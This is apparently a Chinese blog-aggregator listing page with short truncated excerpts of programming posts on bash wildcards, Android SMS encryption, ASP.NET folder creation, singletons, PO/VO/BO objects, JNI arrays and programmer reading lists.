  • linux复习笔记 之bash shell (3) 通配符 eksliang linux 通配符linux通配符
    转载请出自出处: http://eksliang.iteye.com/blog/2104387 在bash的操作环境中有一个非常有用的功能,那就是通配符。 下面列出一些常用的通配符,如下表所示 符号 意义 * 万用字符,代表0个到无穷个任意字符 ? 万用字符,代表一定有一个任意字符 [] 代表一定有一个在中括号内的字符。例如:[abcd]代表一定有一个字符,可能是a、b、c
  • Android关于短信加密 gqdy365 android
    关于Android短信加密功能,我初步了解的如下(只在Android应用层试验):     1、因为Android有短信收发接口,可以调用接口完成短信收发;         发送过程:APP(基于短信应用修改)接受用户输入号码、内容——>APP对短信内容加密——>调用短信发送方法Sm
  • asp.net在网站根目录下创建文件夹 hvt .netC#hovertreeasp.netWeb Forms
    假设要在asp.net网站的根目录下建立文件夹hovertree,C#代码如下: string m_keleyiFolderName = Server.MapPath("/hovertree"); if (Directory.Exists(m_keleyiFolderName)) { //文件夹已经存在 return; } else { try { D
  • 一个合格的程序员应该读过哪些书 justjavac 程序员书籍
    编者按:2008年8月4日,StackOverflow 网友 Bert F 发帖提问:哪本最具影响力的书,是每个程序员都应该读的? “如果能时光倒流,回到过去,作为一个开发人员,你可以告诉自己在职业生涯初期应该读一本, 你会选择哪本书呢?我希望这个书单列表内容丰富,可以涵盖很多东西。” 很多程序员响应,他们在推荐时也写下自己的评语。 以前就有国内网友介绍这个程序员书单,不过都是推荐数
  • 单实例实践 跑龙套_az 单例
       1、内部类 public class Singleton { private static class SingletonHolder { public static Singleton singleton = new Singleton(); } public Singleton getRes
  • PO VO BEAN 理解 q137681467 VODTOpo
    PO:      全称是 persistant object持久对象 最形象的理解就是一个PO就是数据库中的一条记录。 好处是可以把一条记录作为一个对象处理,可以方便的转为其它对象。     BO:     全称是 business object:业务对象 主要作用是把业务逻辑封装为一个对象。这个对
  • 战胜惰性,暗自努力 金笛子 努力
    偶然看到一句很贴近生活的话:“别人都在你看不到的地方暗自努力,在你看得到的地方,他们也和你一样显得吊儿郎当,和你一样会抱怨,而只有你自己相信这些都是真的,最后也只有你一人继续不思进取。”很多句子总在不经意中就会戳中一部分人的软肋,我想我们每个人的周围总是有那么些表现得“吊儿郎当”的存在,是否你就真的相信他们如此不思进取,而开始放松了对自己的要求随波逐流呢? 我有个朋友是搞技术的,平时嘻嘻哈哈,以
  • NDK/JNI二维数组多维数组传递 wenzongliang 二维数组jniNDK
    多维数组和对象数组一样处理,例如二维数组里的每个元素还是一个数组 用jArray表示,直到数组变为一维的,且里面元素为基本类型,去获得一维数组指针。给大家提供个例子。已经测试通过。 Java_cn_wzl_FiveChessView_checkWin( JNIEnv* env,jobject thiz,jobjectArray qizidata) { jint i,j; int s
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他